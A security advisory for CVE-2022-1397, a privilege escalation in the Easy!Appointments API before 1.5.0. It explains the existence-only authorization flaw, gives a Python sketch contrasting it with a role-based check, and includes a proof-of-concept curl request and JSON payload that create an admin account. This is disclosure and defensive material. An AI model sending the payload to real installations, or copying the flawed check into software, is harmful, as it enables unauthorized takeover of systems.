CVE-2022-1397: API Privilege Escalation in easyappointments

API Privilege Escalation in GitHub repository alextselegidis/easyappointments prior to 1.5.0. Full system takeover.

Description

Privilege escalation occurs when a user gains access to more resources or functionality than they are normally allowed; the application should have prevented such elevation. It is usually caused by a flaw in the application.

In the Easy!Appointments API, authorization is checked only against the user's existence, without validating the user's permissions. As a result, a low-privileged user (e.g. a provider) can create a new admin user via the "/api/v1/admins/" endpoint and take over the system.
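As an added illustration (not code from Easy!Appointments), the two patterns the description contrasts: an authorization check that stops at "does this user exist", beside one that also checks the caller's role against the requested resource. The user store, role policy and resource paths are constructed for this example.

```python
import base64
import hmac

# Constructed user store: username -> (password, role). A real application stores
# password hashes; plaintext is used here only to keep the example short.
USERS = {
    "admin": ("adminpass", "admin"),
    "provider1": ("pass", "provider"),
}

# Assumed policy: which roles may write to each resource. Anything not listed is denied.
ALLOWED_ROLES = {
    "/api/v1/admins/": {"admin"},
    "/api/v1/appointments/": {"admin", "provider", "secretary"},
}

def basic_header(username, password):
    """Build an HTTP Basic Authorization header (what curl --user sends)."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return "Basic " + token

def authenticate(header):
    """Authentication only: return the username if the credentials are valid, else None."""
    if not header or not header.startswith("Basic "):
        return None
    try:
        decoded = base64.b64decode(header[6:], validate=True).decode()
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    if ":" not in decoded:
        return None
    username, password = decoded.split(":", 1)
    record = USERS.get(username)
    if record is None or not hmac.compare_digest(record[0].encode(), password.encode()):
        return None
    return username

def authorize_vulnerable(header, path):
    """The flawed pattern: authentication is treated as authorization, so any
    valid user may call any endpoint, including POST /api/v1/admins/."""
    return authenticate(header) is not None

def authorize_fixed(header, path):
    """Hardened pattern: the caller's role must be allowed for the resource."""
    username = authenticate(header)
    if username is None:
        return False
    role = USERS[username][1]
    return role in ALLOWED_ROLES.get(path, set())
```

With the flawed check, a valid provider account passes for the admins resource; with the hardened check only an admin does, and unknown resources or bad credentials are rejected.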

Proof of Concept

curl --request POST https://easyappointments.org/index.php/api/v1/admins/ -d @payload.json --user user:pass

payload.json

{
    "id": 100,
    "firstName": "Admin",
    "lastName": "Admin",
    "email": "[email protected]",
    "mobile": null,
    "phone": "111",
    "address": null,
    "city": null,
    "state": null,
    "zip": null,
    "notes": null,
    "timezone": "UTC",
    "settings": {
        "username": "usern@me",
        "password": "p@ssw0rd",
        "notifications": true,
        "calendarView": "default"
    }
}

Impact

Full system takeover.
